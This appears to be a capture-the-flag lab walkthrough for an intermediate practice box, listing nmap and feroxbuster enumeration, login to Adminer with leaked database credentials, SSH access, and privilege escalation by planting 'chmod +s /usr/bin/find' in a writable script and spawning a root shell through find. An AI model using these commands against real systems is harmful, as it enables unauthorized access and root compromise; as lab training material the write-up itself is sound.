RATING
Intermediate
ENUMERATION
First, we kick it off with our usual nmap scan for these types of boxes:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.84
Navigating over to the target in our browser doesn’t show us anything too interesting, so we proceed with a directory bruteforce using feroxbuster and find an interesting file at http://192.168.163.84/mantisbt/config/a.txt:
Command: feroxbuster -u http://192.168.163.84/ -w /usr/share/wordlists/dirb/big.txt -k --quiet -s 200
Navigating to this url in our browser, we see some database config details:
Since we currently have nowhere to use these config details, we keep bruteforcing with feroxbuster, but this time we filter for php extensions:
Command: feroxbuster -u http://192.168.163.84/ -w /usr/share/wordlists/dirb/big.txt -k --quiet -s 200 -x .php
EXPLOITATION
Navigating over to http://192.168.163.84/adminer.php, we see a login page where we can use the previously found details:
After logging in, we search for user and find mantis_user_table which contains data for user tre:
Since we know this box has port 22 open, we use these details to SSH as user tre:
PRIVILEGE ESCALATION
Running sudo -l, we see that tre has permission to run /sbin/shutdown as root:
After transferring over and running linpeas.sh on this box, we see that the file /usr/bin/check-system is writable by us:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.205/linpeas.sh (on target)
We edit this file to include chmod +s /usr/bin/find to add the SUID bit to this binary (other binaries can be used here):
Since use tre has permission to run shutdown as root, we use this to reboot the box:
Command: sudo shutdown -r now
After the reboot and logging back in, we now have find with the SUID bit and can proceed to use GTFOBins to elevate privileges to root and read our flag:
Command: find . -exec /bin/sh -p \; -quit
